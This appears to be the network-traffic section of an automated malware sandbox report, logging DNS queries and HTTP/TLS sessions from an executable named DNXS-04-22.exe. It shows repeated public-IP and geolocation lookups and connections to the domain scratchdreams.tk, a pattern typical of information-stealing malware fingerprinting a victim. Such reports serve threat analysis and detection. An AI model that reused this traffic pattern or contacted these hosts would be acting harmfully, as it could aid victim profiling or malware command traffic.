                                                              May 2, 2024 08:00:28.849495888 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:28.850070000 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:28.957516909 CEST8049717193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:28.957658052 CEST4971780192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:28.958338976 CEST8049719193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:28.958416939 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:28.958559036 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:29.066813946 CEST8049719193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:29.665608883 CEST8049719193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:29.666918993 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:29.666968107 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:29.667053938 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:29.667284012 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:29.667298079 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:29.714791059 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:29.849915981 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:29.851768970 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:29.851807117 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:30.075386047 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:30.075510979 CEST44349720104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:30.075601101 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:30.076169014 CEST49720443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:30.079520941 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:30.080090046 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:30.187711954 CEST8049719193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:30.187863111 CEST4971980192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:30.188148022 CEST8049721193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:30.188215971 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:30.235372066 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:30.343282938 CEST8049721193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:31.349513054 CEST8049721193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:31.418026924 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:31.525774002 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.525809050 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.525871038 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.526437998 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.526452065 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.708712101 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.726382017 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.726414919 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.956386089 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.956522942 CEST44349722104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:31.956605911 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.957039118 CEST49722443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:31.960225105 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:31.960910082 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.068170071 CEST8049721193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:32.068367958 CEST4972180192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.069163084 CEST8049723193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:32.069256067 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.069479942 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.177364111 CEST8049723193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:32.178241968 CEST8049723193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:32.186765909 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.186814070 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.186997890 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.187148094 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.187160015 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.230590105 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.372229099 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.393805981 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.393838882 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.602057934 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.602161884 CEST44349725104.21.67.152192.168.2.8
                                                              May 2, 2024 08:00:32.602216005 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.602606058 CEST49725443192.168.2.8104.21.67.152
                                                              May 2, 2024 08:00:32.626698971 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.734776974 CEST8049723193.122.130.0192.168.2.8
                                                              May 2, 2024 08:00:32.734831095 CEST4972380192.168.2.8193.122.130.0
                                                              May 2, 2024 08:00:32.778140068 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:32.778188944 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:00:32.778242111 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:32.778706074 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:32.778719902 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:00:32.988868952 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:00:32.988956928 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:32.990669966 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:32.990679026 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:00:32.990923882 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:00:32.992181063 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:00:33.036123037 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:01:12.336486101 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:01:12.336549997 CEST44349726104.21.27.85192.168.2.8
                                                              May 2, 2024 08:01:12.336806059 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:01:12.342061996 CEST49726443192.168.2.8104.21.27.85
                                                              May 2, 2024 08:01:30.010896921 CEST8049713193.122.130.0192.168.2.8
                                                              May 2, 2024 08:01:30.011044025 CEST4971380192.168.2.8193.122.130.0
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              May 2, 2024 08:00:15.714092970 CEST6348753192.168.2.81.1.1.1
                                                              May 2, 2024 08:00:15.801767111 CEST53634871.1.1.1192.168.2.8
                                                              May 2, 2024 08:00:20.680780888 CEST5138953192.168.2.81.1.1.1
                                                              May 2, 2024 08:00:20.769377947 CEST53513891.1.1.1192.168.2.8
                                                              May 2, 2024 08:00:32.627398968 CEST5029653192.168.2.81.1.1.1
                                                              May 2, 2024 08:00:32.777379036 CEST53502961.1.1.1192.168.2.8
                                                              May 2, 2024 08:00:46.314580917 CEST5360553192.168.2.81.1.1.1
                                                              May 2, 2024 08:00:46.432857990 CEST53536051.1.1.1192.168.2.8
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              May 2, 2024 08:00:15.714092970 CEST192.168.2.81.1.1.10x7943Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:20.680780888 CEST192.168.2.81.1.1.10xd987Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:32.627398968 CEST192.168.2.81.1.1.10xdbc2Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:46.314580917 CEST192.168.2.81.1.1.10x9718Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:15.801767111 CEST1.1.1.1192.168.2.80x7943No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:20.769377947 CEST1.1.1.1192.168.2.80xd987No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:20.769377947 CEST1.1.1.1192.168.2.80xd987No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:32.777379036 CEST1.1.1.1192.168.2.80xdbc2No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:32.777379036 CEST1.1.1.1192.168.2.80xdbc2No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:46.432857990 CEST1.1.1.1192.168.2.80x9718No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                              May 2, 2024 08:00:46.432857990 CEST1.1.1.1192.168.2.80x9718No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                              • reallyfreegeoip.org
                                                              • scratchdreams.tk
                                                              • checkip.dyndns.org
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849708193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:15.921848059 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:17.675807953 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
                                                              May 2, 2024 08:00:17.683197975 CEST127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              May 2, 2024 08:00:20.283941031 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:20 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
                                                              May 2, 2024 08:00:21.250121117 CEST127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              May 2, 2024 08:00:23.359821081 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:23 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849713193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:23.891745090 CEST127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              May 2, 2024 08:00:25.000273943 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:24 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849715193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:25.525721073 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:25.635040045 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849717193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:26.154671907 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:27.696715117 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.849719193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:28.958559036 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:29.665608883 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.849721193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:30.235372066 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:31.349513054 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.849723193.122.130.0807264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 2, 2024 08:00:32.069479942 CEST151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              May 2, 2024 08:00:32.178241968 CEST275INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:32 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 106
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.849711104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:21 UTC87OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-05-02 06:00:21 UTC702INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:21 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 505
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR4247YtERVLcGaqC9tymzkraloV7fIc4uqTdpaF1kcpGHCwhNX9g9keOykoJaSrjnn4gbbJNhuWV%2FbNGyAtLuR73OFxtaU0DzztsQM2JaUqzGjZW7IOY2I2p6C5uLxQFkJsax%2Bv"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca5c3fe1423e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:21 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.849712104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:23 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-05-02 06:00:23 UTC702INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:23 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 507
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KdaZiKDScYHzh2zR1R5A0qrZ66OJ9oN9eFyKATRhDldpf0gxTibMQXKqiysT6NtHWGp030PcTPlSxNVdEzjIXrf8u4Cp%2FzGUNhfnuUnmc03L%2BsnR1WvexbYGy7yWblZO0CibOmPL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 87d5ca6c3f987d20-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-05-02 06:00:23 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                              Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                              2024-05-02 06:00:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.849714104.21.67.1524437264C:\Users\user\Desktop\DNXS-04-22.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-02 06:00:25 UTC63OUTGET /xml/191.96.150.225 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-05-02 06:00:25 UTC710INHTTP/1.1 200 OK
                                                              Date: Thu, 02 May 2024 06:00:25 GMT
                                                              Content-Type: application/xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              access-control-allow-origin: *
                                                              vary: Accept-Encoding
                                                              Cache-Control: max-age=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 509
                                                              Last-Modified: Thu, 02 May 2024 05:51:56 GMT
